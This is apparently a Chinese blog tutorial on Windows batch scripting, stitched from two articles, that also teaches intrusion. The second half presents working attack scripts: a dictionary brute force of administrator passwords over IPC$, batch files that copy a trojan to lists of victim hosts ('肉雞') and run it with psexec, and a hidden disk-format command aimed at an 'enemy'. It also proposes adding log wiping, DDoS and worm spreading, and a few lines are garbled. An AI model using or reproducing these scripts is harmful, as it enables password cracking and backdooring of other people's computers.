PAUSE 
ENDLOCAL 
SET PATH 
從上例我們可以看到環境變量PATH第1次被顯示得時候是系統默認路徑。被設置成了E:\TOOLS後顯示爲E:\TOOLS但當ENDLOCAL後我們可以看到他又被還原成了系統的默認路徑。但這個設置只在該批處理運行的時候有作用。當批處理運行完成後環境變量PATH將會還原。

9)   SHIFT

SHIFT命令可以讓在命令上的的命令使用超過10個(%0~%9)以上的可替代參數例: 
ECHO OFF 
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9 
SHIFT 
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9 
SHIFT 
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9 
執行結果如下: 
C::\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11 
1 2 3 4 5 6 7 8 9 
2 3 4 5 6 7 8 9 10 
3 4 5 6 7 8 9 10 11 
以上就是基於WIN2000下的9個批處理命令。

 

附2:特殊的符號與批處理

在命令行下有些符號是不允許使用的但有些符號卻有着特殊的意義。

1)   符號(@)

@在批處理中的意思是關閉當前行的回顯。我們從上面知道用命令echo off可以關掉整個批處理的命令回顯但卻不能不顯示echo off這個命令。現在我們在這個命令前加上@這樣echo off這一命令就被@關閉了回顯從而達到所有命令均不回顯得要求。

2)   符號(>)

>的意思是傳遞並覆蓋。他所起的作用是將運行後的回顯結果傳遞到後面的範圍(後面可是文件也可是默認的系統控制檯)例: 
文件1.txt的文件內容爲: 
1+1 
使用命令c:\>dir *.txt >1.txt
這時候1.txt的內容如下 
驅動器 C 中的卷沒有標籤。 
卷的序列號是 301A-1508 
C:\ 的目錄 
2003-03-11 14:04 1,005 FRUNLOG.TXT 
2003-04-04 16:38 18,598,494 log.txt 
2003-04-04 17:02 5 1.txt 
2003-03-12 11:43 0 aierrorlog.txt 
2003-03-30 00:35 30,571 202.108.txt 
5 個文件 18,630,070 字節 
0 個目錄 1,191,542,784 可用字節 
>將命令執行的結 哺橇嗽 嫉奈募 諶蕁? 
在傳遞給控制檯的時候程序將不會有任何回顯(注意:這裏的回顯跟echo off關掉的回顯不是同一概念。Echo off關掉的是輸入命令的回顯,這裏的回顯是程序執行中或後的回顯)例:
C:\>dir *.txt >nul 
程序將沒有任何顯示也不會產生任何痕跡。

3)   符號(>>)

符號>>的作用與符號>相似,但他們的區別在於>>是傳遞並在文件末尾追加,>>也可將回顯傳遞給控制檯(用法同上)例: 
文件1.txt內同爲: 
1+1 
使用命令c:\>dir *.txt >>1.txt 
這時候1.txt的內容如下 
1+1 
驅動器 C 中的卷沒有標籤。 
卷的序列號是 301A-1508 
C:\ 的目錄 
2003-03-11 14:04 1,005 FRUNLOG.TXT 
2003-04-04 16:38 18,598,494 log.txt 
2003-04-04 17:02 5 1.txt 
2003-03-12 11:43 0 aierrorlog.txt 
2003-03-30 00:35 30,571 202.108.txt 
5 個文件 18,630,070 字節 
0 個目錄 1,191,542,784 可用字節 
>>將命令執行的結果追加在了原始的文件內容後面。

4) 符號(|)

|是一個管道傳輸命令意思是將上一命令執行的結果傳遞給下一命令去處理。例: 
C:\>dir c:\|find "1508" 
卷的序列號是 301A-1508 
以上命令的意思爲查找c:\的所有並發現1508字符串。Find的用法請用 find /?自行查看 
在不使用format的自動格式化參數的時候我是這樣來自動格式化盤片的 
echo y|fornat a: /s /q /v:system 
用過format命令的人都知道format有一個交互對化過程,要使用者輸入y來確定當前的命令是否被執行。在這個命令前加上echo y並用管道傳輸符|將echo執行的結果y傳遞給format從而達到手工輸入y的目的(這條命令有危害性,測試的時候請謹慎)

5)   符號(^)

^ 是對特殊符號 > 、<、 &、的前導字符。在命令中他將以上的3個符號的特殊動能去掉僅僅只吧他們當成符號而不使用他們的特殊意義。例: 
c:\>echo test ^> 1.txt 
test > 1.txt 
從上面可以看出並沒有把test寫入文件1.txt而是將test >1.txt 當字符串顯示了出來。這個符號在遠程構建批處理的時候很有效果。

6)   符號(&)

&符號允許在一行中使用2個以上不同的命令,當第一個命令執行失敗將不影響第2個命令的執行。例: 
c:\> dir z:\ &dir y:\ &dir c:\ 
以上的命令將會連續顯示z: y: c:盤內的內容不理會該盤符是否存在。

7)   符號(&&)

&&符號也是允許在一行中使用2個以上不同的命令,當第一個命令執行失敗後後續的命令將不會再被執行。例: 
c:\> dir z:\ &&dir y:\ &&dir c:\ 
以上的命令將會提示檢查是否存在z:盤如果存在則執行,如果不存在則停止執行所有的後續命令

8) 符號("")

" "符號允許在字符串中包含空格。進入一個特殊的目錄可以用如下方法例: 
c:\>cd "Program Files" 
c:\>cd progra~1 
c:\>cd pro* 
以上方法都可以進入Program Files目錄

9)   符號(,)

,符號相當於空格。在某些特殊的情況下可以用,來代替空格使用。例: 
c:\>dir,c:\

10)  符號(;)

;符號當命令相同的時候可以將不同的目標用;隔離開來但執行效果不變。如執行過程中發生錯誤則只返回錯誤報告但程序還是會繼續執行。例: 
DIR C:\;D:\;E:\F:\ 
以上的命令相當於 
DIR C:\ 
DIR D:\ 
DIR E:\ 
DIR F:\ 
當然還有些特殊的符號但他們的使用範圍很小我就不再這裏一一的說明了。

 










Windows .bat 腳本簡單用法介紹:

一.簡單批處理內部命令簡介 

1.Echo 命令 

打開回顯或關閉請求回顯功能,或顯示消息。如果沒有任何參數,echo 命令將顯示當前回顯設置。 

語法: 

echo [{on│off}] [message] 
Sample:@echo off / echo hello world 

在實際應用中我們會把這條命令和重定向符號(也稱爲管道符號,一般用> >> ^)結合來實現輸入一些命 

令到特定格式的文件中.這將在以後的例子中體現出來。 

2.@ 命令 

表示不顯示@後面的命令,在入侵過程中(例如使用批處理來格式化敵人的硬盤)自然不能讓對方看到你使 

用的命令啦。 

Sample:@echo off 
@echo Now initializing the program,please wait a minite... 
@format X: /q/u/autoset (format 這個命令是不可以使用/y這個參數的,可喜的是微軟留了個autoset這 

個參數給我們,效果和/y是一樣的。) 

3.Goto 命令 

指定跳轉到標籤,找到標籤後,程序將處理從下一行開始的命令。 

語法:goto label (label是參數,指定所要轉向的批處理程序中的行。) 
Sample: 
if {%1}=={} goto noparms 
if {%2}=={} goto noparms(如果這裏的if、%1、%2你不明白的話,先跳過去,後面會有詳細的解釋。) 
@Rem check parameters if null show usage 
:noparms 
echo Usage: monitor.bat ServerIP PortNumber 
goto end 

標籤的名字可以隨便起,但是最好是有意義的字母啦,字母前加個:用來表示這個字母是標籤,goto命令 

就是根據這個:來尋找下一步跳到到那裏。最好有一些說明這樣你別人看起來纔會理解你的意圖啊。 

4.Rem 命令 

註釋命令,在C語言中相當與/*--------*/,它並不會被執行,只是起一個註釋的作用,便於別人閱讀和你 

自己日後修改。 

Rem Message 
Sample:@Rem Here is the description. 

5.Pause 命令 

運行 Pause 命令時,將顯示下面的消息: 
Press any key to continue . . . 

Sample: 
@echo off 
:begin 
copy a:*.* d:\back 
echo Please put a new disk into driver A 
pause 
goto begin 

在這個例子中,驅動器 A 中磁盤上的所有文件均複製到d:\back中。顯示的註釋提示您將另一張磁盤放入 

驅動器 A 時,pause 命令會使程序掛起,以便您更換磁盤,然後按任意鍵繼續處理。 

6.Call 命令 

從一個批處理程序調用另一個批處理程序,並且不終止父批處理程序。call 命令接受用作調用目標的標籤 

。如果在腳本或批處理文件外使用 Call,它將不會在命令行起作用。 

語法: 
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]] 

參數: 
[Drive:}[Path] FileName 

指定要調用的批處理程序的位置和名稱。filename 參數必須具有 .bat 或 .cmd 擴展名。 

7.start 命令 

調用外部程序,所有的DOS命令和命令行程序都可以由start命令來調用。 
常用參數: 
MIN 開始時窗口最小化 
SEPARATE 在分開的空間內開始 16 位 Windows 程序 
HIGH 在 HIGH 優先級類別開始應用程序 
REALTIME 在 REALTIME 優先級類別開始應用程序 
WAIT 啓動應用程序並等候它結束 
parameters 這些爲傳送到命令/程序的參數 

執行的應用程序是 32-位 GUI 應用程序時,CMD.EXE不等應用程序終止就返回命令提示。如果在命令腳本 

內執行,該新行爲則不會發生。 

8.choice 命令 

choice 使用此命令可以讓用戶輸入一個字符,從而運行不同的命令。使用時應該加/c:參數,c:後應寫提 

示可輸入的字符,之間無空格。它的返回碼爲1234...... 

如: choice /c:dme defrag,mem,end 

將顯示 
defrag,mem,end[D,M,E]? 

Sample: 
Sample.bat的內容如下: 

@echo off 
choice /c:dme defrag,mem,end 
if errorlevel 3 goto defrag (應先判斷數值最高的錯誤碼) 
if errorlevel 2 goto mem 
if errotlevel 1 goto end 

:defrag 
c:\dos\defrag 
goto end 
:mem 
mem 
goto end 
:end 
echo good bye 

此文件運行後,將顯示 defrag,mem,end[D,M,E]? 用戶可選擇d m e ,然後if語句將作出判斷,d表示執行 

標號爲defrag的程序段,m表示執行標號爲mem的程序段,e表示執行標號爲end的程序段,每個程序段最後 

都以goto end將程序跳到end標號處,然後程序將顯示good bye,文件結束。 

9.If 命令 

if 表示將判斷是否符合規定的條件,從而決定執行不同的命令。 

有三種格式: 

1)、if "參數" == "字符串" 待執行的命令 
參數如果等於指定的字符串,則條件成立,運行命令,否則運行下一句。(注意是兩個等號) 

如if "%1"=="a" format a: 
if {%1}=={} goto noparms 
if {%2}=={} goto noparms 

2)、if exist 文件名 待執行的命令 
如果有指定的文件,則條件成立,運行命令,否則運行下一句。 

如if exist config.sys edit config.sys 

3)、if errorlevel / if not errorlevel 數字 待執行的命令 
如果返回碼等於指定的數字,則條件成立,運行命令,否則運行下一句。 

如if errorlevel 2 goto x2 

DOS程序運行時都會返回一個數字給DOS,稱爲錯誤碼errorlevel或稱返回碼,常見的返回碼爲0、1。 

10.for 命令 

for 命令是一個比較複雜的命令,主要用於參數在指定的範圍內循環執行命令。 
在批處理文件中使用 FOR 命令時,指定變量請使用 %%variable 

for {%variable│%%variable} in (set) do command [ CommandLineOptions] 
%variable 指定一個單一字母可替換的參數。 
(set) 指定一個或一組文件。可以使用通配符。 
command 指定對每個文件執行的命令。 
command-parameters 爲特定命令指定參數或命令行開關。 

在批處理文件中使用 FOR 命令時,指定變量請使用 %%variable 
而不要用 %variable。變量名稱是區分大小寫的,所以 %i 不同於 %I 

如果命令擴展名被啓用,下列額外的 FOR 命令格式會受到支持: 
FOR /D %variable IN (set) DO command [command-parameters] 

如果集中包含通配符,則指定與目錄名匹配,而不與文件名匹配。 

FOR /R [[drive:]path] %variable IN (set) DO command [command-parameters] 

檢查以 [drive:]path 爲根的目錄樹,指向每個目錄中的FOR 語句。如果在 /R 後沒有指定目錄,則使用 

當前目錄。如果集僅爲一個單點(.)字符,則枚舉該目錄樹。 

FOR /L %variable IN (start,step,end) DO command [command-parameters] 

該集表示以增量形式從開始到結束的一個數字序列。 
因此,(1,1,5) 將產生序列 1 2 3 4 5,(5,-1,1) 將產生 
序列 (5 4 3 2 1)。 

FOR /F ["options"] %variable IN (file-set) DO command 
FOR /F ["options"] %variable IN ("string") DO command 
FOR /F ["options"] %variable IN ('command') DO command 

或者,如果有 usebackq 選項: 

FOR /F ["options"] %variable IN (file-set) DO command 
FOR /F ["options"] %variable IN ("string") DO command 
FOR /F ["options"] %variable IN ('command') DO command 

filenameset 爲一個或多個文件名。繼續到 filenameset 中的下一個文件之前,每份文件都已被打開、讀 

取並經過處理。 
處理包括讀取文件,將其分成一行行的文字,然後將每行解析成零或更多的符號。然後用已找到的符號字 

符串變量值調用 For 循環。以默認方式,/F 通過每個文件的每一行中分開的第一個空白符號。跳過空白 

行。您可通過指定可選 "options" 參數替代默認解析操作。這個帶引號的字符串包括一個或多個指定不同 

解析選項的關鍵字。這些關鍵字爲: 

eol=c - 指一個行註釋字符的結尾(就一個) 
skip=n - 指在文件開始時忽略的行數。 
delims=xxx - 指分隔符集。這個替換了空格和跳格鍵的默認分隔符集。 
tokens=x,y,m-n - 指每行的哪一個符號被傳遞到每個迭代的 for 本身。這會導致額外變量名稱的 
格式爲一個範圍。通過 nth 符號指定 m 符號字符串中的最後一個字符星號,那麼額外的變量將在最後一 

個符號解析之分配並接受行的保留文本。 
usebackq - 指定新語法已在下類情況中使用: 
在作爲命令執行一個後引號的字符串並且引號字符爲文字字符串命令並允許在 file-set中使用雙引號擴起 

文件名稱。 

sample1: 
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command 

會分析 myfile.txt 中的每一行,忽略以分號打頭的那些行,將每行中的第二個和第三個符號傳遞給 for 

程序體;用逗號和/或 空格定界符號。請注意,這個 for 程序體的語句引用 %i 來取得第二個符號,引用 

%j 來取得第三個符號,引用 %k來取得第三個符號後的所有剩餘符號。對於帶有空格的文件名,您需要用 

雙引號將文件名括起來。爲了用這種方式來使用雙引號,您還需要使用 usebackq 選項,否則,雙引號會 

被理解成是用作定義某個要分析的字符串的。 

%i 專門在 for 語句中得到說明,%j 和 %k 是通過tokens= 選項專門得到說明的。您可以通過 tokens= 

一行指定最多 26 個符號,只要不試圖說明一個高於字母 'z' 或'Z' 的變量。請記住,FOR 變量是單一字 

母、分大小寫和全局的;同時不能有 52 個以上都在使用中。 

您還可以在相鄰字符串上使用 FOR /F 分析邏輯;方法是,用單引號將括號之間的 filenameset 括起來。 

這樣,該字符串會被當作一個文件中的一個單一輸入行。 

最後,您可以用 FOR /F 命令來分析命令的輸出。方法是,將括號之間的 filenameset 變成一個反括字符 

串。該字符串會被當作命令行,傳遞到一個子 CMD.EXE,其輸出會被抓進內存,並被當作文件分析。因此 

,以下例子: 

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 

會枚舉當前環境中的環境變量名稱。 

另外,FOR 變量參照的替換已被增強。您現在可以使用下列選項語法: 

~I - 刪除任何引號("),擴充 %I 
%~fI - 將 %I 擴充到一個完全合格的路徑名 
%~dI - 僅將 %I 擴充到一個驅動器號 
%~pI - 僅將 %I 擴充到一個路徑 
%~nI - 僅將 %I 擴充到一個文件名 
%~xI - 僅將 %I 擴充到一個文件擴展名 
%~sI - 擴充的路徑只含有短名 
%~aI - 將 %I 擴充到文件的文件屬性 
%~tI - 將 %I 擴充到文件的日期/時間 
%~zI - 將 %I 擴充到文件的大小 
%~$PATH:I - 查找列在路徑環境變量的目錄,並將 %I 擴充到找到的第一個完全合格的名稱。如果環境變 

量未被定義,或者沒有找到文件,此組合鍵會擴充空字符串 

可以組合修飾符來得到多重結果: 

%~dpI - 僅將 %I 擴充到一個驅動器號和路徑 
%~nxI - 僅將 %I 擴充到一個文件名和擴展名 
%~fsI - 僅將 %I 擴充到一個帶有短名的完整路徑名 
%~dp$PATH:i - 查找列在路徑環境變量的目錄,並將 %I 擴充到找到的第一個驅動器號和路徑。 
%~ftzaI - 將 %I 擴充到類似輸出線路的 DIR 

在以上例子中,%I 和 PATH 可用其他有效數值代替。%~ 語法用一個有效的 FOR 變量名終止。選取類似 

%I 的大寫變量名比較易讀,而且避免與不分大小寫的組合鍵混淆。 

以上是MS的官方幫助,下面我們舉幾個例子來具體說明一下For命令在入侵中的用途。 

sample2: 

利用For命令來實現對一臺目標Win2k主機的暴力密碼破解。 

我們用net use file://ip/ipc$ "password" /u:"administrator"來嘗試這和目標主機進行連接,當成功時記下 

密碼。 
最主要的命令是一條:for /f i% in (dict.txt) do net use file://ip/ipc$ "i%" /u:"administrator" 
用i%來表示admin的密碼,在dict.txt中這個取i%的值用net use 命令來連接。然後將程序運行結果傳遞給 

find命令-- 
for /f i%% in (dict.txt) do net use file://ip/ipc$ "i%%" /u:"administrator"│find ":命令成功完 

成">>D:\ok.txt ,這樣就ko了。 

sample3: 

你有沒有過手裏有大量肉雞等着你去種後門+木馬呢?,當數量特別多的時候,原本很開心的一件事都會 

變得很鬱悶:)。文章開頭就談到使用批處理文件,可以簡化日常或重複性任務。那麼如何實現呢?呵呵 

,看下去你就會明白了。 

主要命令也只有一條:(在批處理文件中使用 FOR 命令時,指定變量使用 %%variable) 
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k 
tokens的用法請參見上面的sample1,在這裏它表示按順序將victim.txt中的內容傳遞給door.bat中的參數 

%i %j %k。 
而cultivate.bat無非就是用net use命令來建立IPC$連接,並copy木馬+後門到victim,然後用返回碼 

(If errorlever =)來篩選成功種植後門的主機,並echo出來,或者echo到指定的文件。 
delims= 表示vivtim.txt中的內容是一空格來分隔的。我想看到這裏你也一定明白這victim.txt裏的內容 

是什麼樣的了。應該根據%%i %%j %%k表示的對象來排列,一般就是 ip password username。 

代碼雛形: 
--------------- cut here then save as a batchfile(I call it main.bat ) --------------------- 

------ 
@echo off 
@if "%1"=="" goto usage 
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k 
@goto end 
:usage 
@echo run this batch in dos modle.or just double-click it. 
:end 
--------------- cut here then save as a batchfile(I call it main.bat ) --------------------- 

------ 

------------------- cut here then save as a batchfile(I call it door.bat) ------------------ 

----------- 
@net use file://%1/ipc$ %3 /u:"%2" 
@if errorlevel 1 goto failed 
@echo Trying to establish the IPC$ connection ............OK 
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 

>>ko.txt 
@psexec file://%1/ c:\winnt\system32\windrv32.exe 
@psexec file://%1/ net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt 
:failed 
@echo Sorry can not connected to the victim. 
----------------- cut here then save as a batchfile(I call it door.bat) -------------------- 

------------ 

這只是一個自動種植後門批處理的雛形,兩個批處理和後門程序(Windrv32.exe),PSexec.exe需放在統一 

目錄下.批處理內容 
尚可擴展,例如:加入清除日誌+DDOS的功能,加入定時添加用戶的功能,更深入一點可以使之具備自動傳播功 

能(蠕蟲).此處不多做敘述,有興趣的朋友可自行研究. 

二.如何在批處理文件中使用參數 

批處理中可以使用參數,一般從1%到 9%這九個,當有多個參數時需要用shift來移動,這種情況並不多見 

,我們就不考慮它了。 

sample1:fomat.bat 

@echo off 
if "%1"=="a" format a: 
:format 
@format a:/q/u/auotset 
@echo please insert another disk to driver A. 
@pause 
@goto fomat 
這個例子用於連續地格式化幾張軟盤,所以用的時候需在dos窗口輸入fomat.bat a,呵呵,好像有點畫蛇添 

足了~ 

sample2: 

當我們要建立一個IPC$連接地時候總要輸入一大串命令,弄不好就打錯了,所以我們不如把一些固定命令 

寫入一個批處理,把肉雞地ip password username 當着參數來賦給這個批處理,這樣就不用每次都打命令 

了。 
@echo off 
@net use file://1%/ipc$ "2%" /u:"3%" 注意哦,這裏PASSWORD是第二個參數。 
@if errorlevel 1 echo connection failed 
怎麼樣,使用參數還是比較簡單的吧?你這麼帥一定學會了.No.3 

三.如何使用組合命令(Compound Command) 

1.& 

Usage:第一條命令 & 第二條命令 [& 第三條命令...] 

用這種方法可以同時執行多條命令,而不管命令是否執行成功 

Sample: 
C:\>dir z: & dir c:\Ex4rch 
The system cannot find the path specified. 
Volume in drive C has no label. 
Volume Serial Number is 0078-59FB 

Directory of c:\Ex4rch 

2002-05-14 23:51 . 
2002-05-14 23:51 .. 
2002-05-14 23:51 14 sometips.gif 

2.&& 
Usage:第一條命令 && 第二條命令 [&& 第三條命令...] 

用這種方法可以同時執行多條命令,當碰到執行出錯的命令後將不執行後面的命令,如果一直沒有出錯則 

一直執行完所有命令; 

Sample: 
C:\>dir z: && dir c:\Ex4rch 
The system cannot find the path specified. 

C:\>dir c:\Ex4rch && dir z: 
Volume in drive C has no label. 
Volume Serial Number is 0078-59FB 

Directory of c:\Ex4rch 

2002-05-14 23:55 . 
2002-05-14 23:55 .. 
2002-05-14 23:55 14 sometips.gif 
1 File(s) 14 bytes 
2 Dir(s) 768,671,744 bytes free 
The system cannot find the path specified. 

在做備份的時候可能會用到這種命令會比較簡單,如: 
dir file&://192.168.0.1/database/backup.mdb && copy file&://192.168.0.1/database/backup.mdb 

E:\backup 
如果遠程服務器上存在backup.mdb文件,就執行copy命令,若不存在該文件則不執行copy命令。這種用法 

可以替換IF exist了. 

3.││ 

Usage:第一條命令 ││ 第二條命令 [││ 第三條命令...] 

用這種方法可以同時執行多條命令,當碰到執行正確的命令後將不執行後面的命令,如果沒有出現正確的 

命令則一直執行完所有命令; 

Sample: 
C:\Ex4rch>dir sometips.gif ││ del sometips.gif 
Volume in drive C has no label. 
Volume Serial Number is 0078-59FB 

Directory of C:\Ex4rch 

2002-05-14 23:55 14 sometips.gif 
1 File(s) 14 bytes 
0 Dir(s) 768,696,320 bytes free 

組合命令使用的例子: 

sample: 
@copy trojan.exe file://%1/admin$/system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 

>>victim.txt 

四、管道命令的使用 

1.│ 命令 
Usage:第一條命令 │ 第二條命令 [│ 第三條命令...] 
將第一條命令的結果作爲第二條命令的參數來使用,記得在unix中這種方式很常見。 

sample: 
time /t>>D:\IP.log 
netstat -n -p tcp│find ":3389">>D:\IP.log 
start Explorer 

看出來了麼?用於終端服務允許我們爲用戶自定義起始的程序,來實現讓用戶運行下面這個bat,以獲得登 

錄用戶的IP。 

2.>、>>輸出重定向命令 
將一條命令或某個程序輸出結果的重定向到特定文件中, > 與 >>的區別在於,>會清除調原有文件中的內 

容後寫入指定文件,而>>只會追加內容到指定文件中,而不會改動其中的內容。 

sample1: 
echo hello world>c:\hello.txt (stupid example?) 

sample2: 
時下DLL木馬盛行,我們知道system32是個捉迷藏的好地方,許多木馬都削尖了腦袋往那裏鑽,DLL馬也不 

例外,針對這一點我們可以在安裝好系統和必要的應用程序後,對該目錄下的EXE和DLL文件作一個記錄: 
運行CMD--轉換目錄到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt, 
這樣所有的EXE和DLL文件的名稱都被分別記錄到exeback.txt和dllback.txt中, 
日後如發現異常但用傳統的方法查不出問題時,則要考慮是不是系統中已經潛入DLL木馬了. 
這時我們用同樣的命令將system32下的EXE和DLL文件記錄到另外的exeback1.txt和dllback1.txt中,然後運 

行: 
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比 

較前後兩次的DLL和EXE文件,並將結果輸入到diff.txt中),這樣我們就能發現一些多出來的DLL和EXE文件, 

然後通過查看創建時間、版本、是否經過壓縮等就能夠比較容易地判斷出是不是已經被DLL木馬光顧了。沒 

有是最好,如果有的話也不要直接DEL掉,先用regsvr32 /u trojan.dll將後門DLL文件註銷掉,再把它移到 

回收站裏,若系統沒有異常反映再將之徹底刪除或者提交給殺毒軟件公司。 

3.< 、>& 、<& 
< 從文件中而不是從鍵盤中讀入命令輸入。 
>& 將一個句柄的輸出寫入到另一個句柄的輸入中。 
<& 從一個句柄讀取輸入並將其寫入到另一個句柄輸出中。 
這些並不常用,也就不多做介紹。
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章